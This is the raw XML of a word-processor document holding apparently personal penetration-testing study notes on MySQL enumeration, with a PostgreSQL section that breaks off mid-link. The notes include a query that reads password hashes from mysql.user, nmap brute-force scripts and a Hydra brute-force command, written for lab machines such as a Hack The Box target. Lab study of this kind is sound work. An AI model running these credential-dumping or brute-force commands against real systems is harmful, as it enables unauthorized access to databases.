        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user_name </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is column name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user, authentication_string </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM mysql.user WHERE user = 'offsec';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1410"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can select</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> multiple columns</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> this way</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqql commands for system:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select version(); </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> select @@version;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A51">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="1812436" cy="1033407"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="197" name="image191.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image191.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId540"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1812436" cy="1033407"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select system_user();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A53">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="1910965" cy="1029798"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="131" name="image126.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image126.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId541"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1910965" cy="1029798"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The root user in this example is the database-specific root user, not the system-wide administrative root user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A55">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Banner Grabbing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1303"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">telnet [IP] 3306 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1303"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql runs on</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3306</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1303"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Banner grabbing means to get information about a service running on a system, such as its software version, configuration details, or operating system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1303"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It might tell us what version of mysql is running, like MariaDB version 10.3.27</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A5C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A5D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A5E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap MySQL Scripts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="553"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -sV -p3306 --script=mysql* &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="553"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Runs all the mysql scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A61">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A62">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Useful scripts include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="920"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql-brute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Performs brute-force attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="920"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql-empty-password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Checks for accounts with no passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="920"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql-users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Lists MySQL usernames.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="920"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql-databases</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Attempts to list databases if credentials are found.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A67">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A68">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A69">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are inside a reverseshell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -h db -u [username] -p </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in the MonitorsTwo HTB, if you put in the IP address for the "-h" argument, it doesn't work. You had to put the "db" argument. It might be a address resolution thing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also, I was inside a Docker Container, so that might be a reason</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A6D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A6E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="327"/>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1A70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="327"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">quit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A71">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A72">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A73">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bruteforce with Hydra:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1363"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L usernames.txt -P passwords.txt -f -v &lt;IP&gt; mysql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A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76">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A77">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8r5f4s0nzrt" w:id="218"/>
      <w:bookmarkEnd w:id="218"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Postgresql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A78">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usually port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5432</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A79">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A7A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try Postgresql Default Credentials. This was used in </w:t>
      </w:r>
      <w:hyperlink r:id="rId542">
